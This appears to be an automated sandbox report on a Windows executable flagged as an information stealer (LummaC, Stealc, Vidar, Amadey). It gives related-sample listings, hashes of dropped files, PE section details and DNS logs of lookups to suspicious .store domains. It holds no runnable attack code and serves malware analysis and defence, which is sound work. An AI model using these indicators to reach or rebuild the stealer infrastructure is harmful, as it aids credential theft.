	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	p5iu2ILQzE.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	build.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
C:\ProgramData\chrome.dll	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, XWorm	Browse
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, XWorm	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	ByVoN4bhSU.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	QS4CbvR1WQ.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse

Process:	C:\Users\user\AppData\Local\Temp\1004195001\2bbe886987.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.0357803477377646
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWwJU0VnQphI1mJ/8GJK:58r54w0VW3xWB0VaI4
MD5:	76D181A334D47872CD2E37135CC83F95
SHA1:	B563370B023073CE6E0F63671AA4AF169ABBF4E1
SHA-256:	52D831CC6F56C3A25EB9238AAF25348E1C4A3D361DFE7F99DB1D37D89A0057FD
SHA-512:	23E0D43E4785E5686868D5448628718720C5A8D9328EE814CB77807260F7CDA2D01C5DEE8F58B5713F4F09319E6CB7AB24725078C01322BAE04777418A49A9F7
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44906
Entropy (8bit):	6.095078747932051
Encrypted:	false
SSDEEP:	768:+DXzgWPsj/qlGJqIY8GB4kWx6i1zNto+xNsKLFkyEsKJDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynEjKtSmd6qE7lFoC
MD5:	E64466E750421AC46A84903F792DF66A
SHA1:	D256D1EBD3F36F996CFFC1A457E28D24DEC79BCD
SHA-256:	6B25DBD43BEF5192E68CA64B43EDAE2C34466915918F238A2447ADB95063B8CC
SHA-512:	385346E8F3059462BBBEE4A624640D9EBEFB6DE0798F30835D083206A8D3436121D5D19B6CACD9B9E047890123CD84C29EB7CF06766D0B4E8007F6DA047D60B2
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3301888
Entropy (8bit):	6.638279327231539
Encrypted:	false
SSDEEP:	49152:zwuqnxzJGz0FiD0A4GyNe/98+njyKN1YrXbPU:enx1Gz0FiD0A4Re/2+njrErr
MD5:	1F851E1840E1A5A45D8C21630061CFC7
SHA1:	EA05EDF1430B5CFB312F07CE13314AC4D7F61BF8
SHA-256:	259B76B23A393BBE38478A12F7DF76EB71B676A0A0B6C1BB8F3085C5F4E6B461
SHA-512:	79A4007940E0B18817993F92E5A3C9DE360AEC6FF0EFB66280B2A9B54A54ADE74F655F3B93A5F933CD9E8DC7371757F4927201982FC6AD1C3EDC7D51A23B1B11
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 53%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f.............................p2...........@...........................2......M3...@.................................W...k............................S2..............................S2..................................................... . ............................@....rsrc...............................@....idata ............................@...lfjbhkvb..+.......+.................@...xakcdfow.....`2......:2.............@....taggant.0...p2.."...@2.............@...........................................................................................................................................................................................................................................................

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (5162), with no line terminators
Category:	downloaded
Size (bytes):	5162
Entropy (8bit):	5.3503139230837595
Encrypted:	false
SSDEEP:	96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
MD5:	7977D5A9F0D7D67DE08DECF635B4B519
SHA1:	4A66E5FC1143241897F407CEB5C08C36767726C1
SHA-256:	FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
SHA-512:	8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
Malicious:	false
URL:	"https://www.gstatic.com/og/_/ss/k=og.qtm.GZmhE2vV14w.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTuKvZ-nsYNivRzfGpm8QSi6tMFrvg"
Preview:	.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3

Entrypoint:	0x727000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6a057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x69000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x3253fc	0x10	lfjbhkvb
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x3253ac	0x18	lfjbhkvb
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x68000	0x68000	89862f7c3d66f4aa6f0ab5f08d4a1809	False	0.5578049879807693	data	7.088281231299538	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x69000	0x1e0	0x200	b7d16686b376821266a9345c26b7e6d6	False	0.53125	data	4.7176788329467545	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6a000	0x1000	0x200	cc76e3822efdc911f469a3e3cc9ce9fe	False	0.1484375	data	1.0428145631430756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
lfjbhkvb	0x6b000	0x2bb000	0x2ba600	8a9d4a1c2e55b16a9772f13a7fc5a0af	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
xakcdfow	0x326000	0x1000	0x600	a9a2bf5fb0abe91abfb5bf876416c526	False	0.5755208333333334	data	5.03595098288886	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x327000	0x3000	0x2200	65bdf9359fa19de9983b2fd8140f7f4a	False	0.08122702205882353	DOS executable (COM)	0.9149190795111122	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 5, 2024 20:50:52.334223032 CET	192.168.2.6	1.1.1.1	0x4a09	Standard query (0)	tse1.mm.bing.net	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:12.492136002 CET	192.168.2.6	1.1.1.1	0xe01	Standard query (0)	presticitpo.store	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:12.521255970 CET	192.168.2.6	1.1.1.1	0xed61	Standard query (0)	crisiwarny.store	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:12.551356077 CET	192.168.2.6	1.1.1.1	0xf77f	Standard query (0)	fadehairucw.store	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:12.575900078 CET	192.168.2.6	1.1.1.1	0xb3d6	Standard query (0)	thumbystriw.store	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:12.614222050 CET	192.168.2.6	1.1.1.1	0x72d4	Standard query (0)	necklacedmny.store	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:12.639894962 CET	192.168.2.6	1.1.1.1	0xd8bb	Standard query (0)	founpiuer.store	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:25.443082094 CET	192.168.2.6	1.1.1.1	0x14c8	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:25.443399906 CET	192.168.2.6	1.1.1.1	0x33bf	Standard query (0)	www.google.com	65	IN (0x0001)	false
Nov 5, 2024 20:52:28.101532936 CET	192.168.2.6	1.1.1.1	0x1206	Standard query (0)	presticitpo.store	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:28.129529953 CET	192.168.2.6	1.1.1.1	0xcc76	Standard query (0)	crisiwarny.store	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:28.157648087 CET	192.168.2.6	1.1.1.1	0x6255	Standard query (0)	fadehairucw.store	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:28.182442904 CET	192.168.2.6	1.1.1.1	0xc30b	Standard query (0)	thumbystriw.store	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:28.210532904 CET	192.168.2.6	1.1.1.1	0x6a08	Standard query (0)	necklacedmny.store	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:28.955466986 CET	192.168.2.6	1.1.1.1	0x260b	Standard query (0)	apis.google.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:28.955847979 CET	192.168.2.6	1.1.1.1	0xe78b	Standard query (0)	apis.google.com	65	IN (0x0001)	false
Nov 5, 2024 20:52:29.945086002 CET	192.168.2.6	1.1.1.1	0x5cc8	Standard query (0)	play.google.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:29.945264101 CET	192.168.2.6	1.1.1.1	0x16b6	Standard query (0)	play.google.com	65	IN (0x0001)	false
Nov 5, 2024 20:52:32.359292030 CET	192.168.2.6	1.1.1.1	0x2958	Standard query (0)	play.google.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:32.359828949 CET	192.168.2.6	1.1.1.1	0x3dc7	Standard query (0)	play.google.com	65	IN (0x0001)	false
Nov 5, 2024 20:52:39.692697048 CET	192.168.2.6	1.1.1.1	0x707a	Standard query (0)	ntp.msn.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:39.692876101 CET	192.168.2.6	1.1.1.1	0xc5d3	Standard query (0)	ntp.msn.com	65	IN (0x0001)	false
Nov 5, 2024 20:52:41.053350925 CET	192.168.2.6	1.1.1.1	0x851	Standard query (0)	bzib.nelreports.net	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:41.055144072 CET	192.168.2.6	1.1.1.1	0xc207	Standard query (0)	bzib.nelreports.net	65	IN (0x0001)	false
Nov 5, 2024 20:52:41.988168955 CET	192.168.2.6	1.1.1.1	0x60ec	Standard query (0)	necklacedmny.store	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:42.298463106 CET	192.168.2.6	1.1.1.1	0xaf58	Standard query (0)	sb.scorecardresearch.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:42.298860073 CET	192.168.2.6	1.1.1.1	0x3167	Standard query (0)	sb.scorecardresearch.com	65	IN (0x0001)	false
Nov 5, 2024 20:52:42.312097073 CET	192.168.2.6	1.1.1.1	0x33b1	Standard query (0)	c.msn.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:42.312477112 CET	192.168.2.6	1.1.1.1	0x7b80	Standard query (0)	c.msn.com	65	IN (0x0001)	false
Nov 5, 2024 20:52:42.315943003 CET	192.168.2.6	1.1.1.1	0x178d	Standard query (0)	assets.msn.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:42.316066980 CET	192.168.2.6	1.1.1.1	0x32f9	Standard query (0)	assets.msn.com	65	IN (0x0001)	false
Nov 5, 2024 20:52:42.323620081 CET	192.168.2.6	1.1.1.1	0x212d	Standard query (0)	api.msn.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:42.323884010 CET	192.168.2.6	1.1.1.1	0x9cc2	Standard query (0)	api.msn.com	65	IN (0x0001)	false
Nov 5, 2024 20:52:43.119662046 CET	192.168.2.6	1.1.1.1	0x66ef	Standard query (0)	clients2.googleusercontent.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:43.119792938 CET	192.168.2.6	1.1.1.1	0xd18d	Standard query (0)	clients2.googleusercontent.com	65	IN (0x0001)	false
Nov 5, 2024 20:52:44.158500910 CET	192.168.2.6	1.1.1.1	0x6f81	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:44.158694983 CET	192.168.2.6	1.1.1.1	0x4380	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 5, 2024 20:52:44.159039021 CET	192.168.2.6	1.1.1.1	0x4b79	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:44.159231901 CET	192.168.2.6	1.1.1.1	0xaff9	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 5, 2024 20:52:44.192257881 CET	192.168.2.6	1.1.1.1	0xfbc8	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:44.192447901 CET	192.168.2.6	1.1.1.1	0x98a6	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 5, 2024 20:52:55.200459957 CET	192.168.2.6	1.1.1.1	0xb6e0	Standard query (0)	presticitpo.store	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:55.229468107 CET	192.168.2.6	1.1.1.1	0x54d3	Standard query (0)	crisiwarny.store	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:55.266048908 CET	192.168.2.6	1.1.1.1	0xfac6	Standard query (0)	fadehairucw.store	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:55.302830935 CET	192.168.2.6	1.1.1.1	0xde4e	Standard query (0)	thumbystriw.store	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:55.372195005 CET	192.168.2.6	1.1.1.1	0x651e	Standard query (0)	necklacedmny.store	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:53:05.282177925 CET	192.168.2.6	1.1.1.1	0x1bd4	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:53:05.282289982 CET	192.168.2.6	1.1.1.1	0x18f4	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 5, 2024 20:53:05.282749891 CET	192.168.2.6	1.1.1.1	0xea82	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:53:05.282871962 CET	192.168.2.6	1.1.1.1	0x9a2b	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 5, 2024 20:53:05.303498983 CET	192.168.2.6	1.1.1.1	0xd109	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:53:05.303621054 CET	192.168.2.6	1.1.1.1	0xf174	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 5, 2024 20:53:17.342101097 CET	192.168.2.6	1.1.1.1	0x3df6	Standard query (0)	necklacedmny.store	A (IP address)	IN (0x0001)	false

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 5, 2024 20:50:52.342317104 CET	1.1.1.1	192.168.2.6	0x4a09	No error (0)	tse1.mm.bing.net	mm-mm.bing.net.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 20:50:52.342317104 CET	1.1.1.1	192.168.2.6	0x4a09	No error (0)	ax-0001.ax-msedge.net		150.171.28.10	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:50:52.342317104 CET	1.1.1.1	192.168.2.6	0x4a09	No error (0)	ax-0001.ax-msedge.net		150.171.27.10	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:12.514864922 CET	1.1.1.1	192.168.2.6	0xe01	Name error (3)	presticitpo.store	none	none	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:12.549040079 CET	1.1.1.1	192.168.2.6	0xed61	Name error (3)	crisiwarny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:12.574148893 CET	1.1.1.1	192.168.2.6	0xf77f	Name error (3)	fadehairucw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:12.611430883 CET	1.1.1.1	192.168.2.6	0xb3d6	Name error (3)	thumbystriw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:12.637095928 CET	1.1.1.1	192.168.2.6	0x72d4	Name error (3)	necklacedmny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:12.680177927 CET	1.1.1.1	192.168.2.6	0xd8bb	No error (0)	founpiuer.store		104.21.5.155	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:12.680177927 CET	1.1.1.1	192.168.2.6	0xd8bb	No error (0)	founpiuer.store		172.67.133.135	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:25.450114012 CET	1.1.1.1	192.168.2.6	0x14c8	No error (0)	www.google.com		142.250.186.100	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:25.450313091 CET	1.1.1.1	192.168.2.6	0x33bf	No error (0)	www.google.com			65	IN (0x0001)	false
Nov 5, 2024 20:52:28.125329971 CET	1.1.1.1	192.168.2.6	0x1206	Name error (3)	presticitpo.store	none	none	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:28.151751995 CET	1.1.1.1	192.168.2.6	0xcc76	Name error (3)	crisiwarny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:28.180212975 CET	1.1.1.1	192.168.2.6	0x6255	Name error (3)	fadehairucw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:28.205266953 CET	1.1.1.1	192.168.2.6	0xc30b	Name error (3)	thumbystriw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:28.235140085 CET	1.1.1.1	192.168.2.6	0x6a08	Name error (3)	necklacedmny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:28.965825081 CET	1.1.1.1	192.168.2.6	0x260b	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 20:52:28.965825081 CET	1.1.1.1	192.168.2.6	0x260b	No error (0)	plus.l.google.com		142.250.74.206	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:28.965845108 CET	1.1.1.1	192.168.2.6	0xe78b	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 20:52:29.952003956 CET	1.1.1.1	192.168.2.6	0x5cc8	No error (0)	play.google.com		142.250.185.206	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:32.366741896 CET	1.1.1.1	192.168.2.6	0x2958	No error (0)	play.google.com		142.250.185.238	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:39.694833040 CET	1.1.1.1	192.168.2.6	0x460a	No error (0)	svc.ha-teams.office.com	svc.ms-acdc-teams.office.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 20:52:39.701004028 CET	1.1.1.1	192.168.2.6	0x707a	No error (0)	ntp.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 20:52:39.702347040 CET	1.1.1.1	192.168.2.6	0xc5d3	No error (0)	ntp.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 20:52:39.755136967 CET	1.1.1.1	192.168.2.6	0x5a55	No error (0)	bingadsedgeextension-prod-europe.azurewebsites.net	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 20:52:39.755136967 CET	1.1.1.1	192.168.2.6	0x5a55	No error (0)	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		94.245.104.56	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:39.756021976 CET	1.1.1.1	192.168.2.6	0x202c	No error (0)	bingadsedgeextension-prod-europe.azurewebsites.net	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 20:52:41.063052893 CET	1.1.1.1	192.168.2.6	0xc207	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 20:52:41.810622931 CET	1.1.1.1	192.168.2.6	0x63b0	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 20:52:42.011219978 CET	1.1.1.1	192.168.2.6	0x60ec	Name error (3)	necklacedmny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:42.309365034 CET	1.1.1.1	192.168.2.6	0xaf58	No error (0)	sb.scorecardresearch.com		18.244.18.27	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:42.309365034 CET	1.1.1.1	192.168.2.6	0xaf58	No error (0)	sb.scorecardresearch.com		18.244.18.122	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:42.309365034 CET	1.1.1.1	192.168.2.6	0xaf58	No error (0)	sb.scorecardresearch.com		18.244.18.32	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:42.309365034 CET	1.1.1.1	192.168.2.6	0xaf58	No error (0)	sb.scorecardresearch.com		18.244.18.38	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:42.320350885 CET	1.1.1.1	192.168.2.6	0x7b80	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 20:52:42.320847988 CET	1.1.1.1	192.168.2.6	0x33b1	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 20:52:42.323051929 CET	1.1.1.1	192.168.2.6	0x178d	No error (0)	assets.msn.com	assets.msn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 20:52:42.323652029 CET	1.1.1.1	192.168.2.6	0x32f9	No error (0)	assets.msn.com	assets.msn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 20:52:42.330702066 CET	1.1.1.1	192.168.2.6	0x212d	No error (0)	api.msn.com	api-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 20:52:42.330725908 CET	1.1.1.1	192.168.2.6	0x9cc2	No error (0)	api.msn.com	api-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 20:52:43.127111912 CET	1.1.1.1	192.168.2.6	0xd18d	No error (0)	clients2.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 20:52:43.127124071 CET	1.1.1.1	192.168.2.6	0x66ef	No error (0)	clients2.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 20:52:43.127124071 CET	1.1.1.1	192.168.2.6	0x66ef	No error (0)	googlehosted.l.googleusercontent.com		142.250.185.65	A (IP address)	IN (0x0001)	false
Nov 5, 2024 20:52:44.165640116 CET	1.1.1.1	192.168.2.6	0x4380	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 5, 2024 20:52:44.165653944 CET	1.1.1.1	192.168.2.6	0x6f81	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
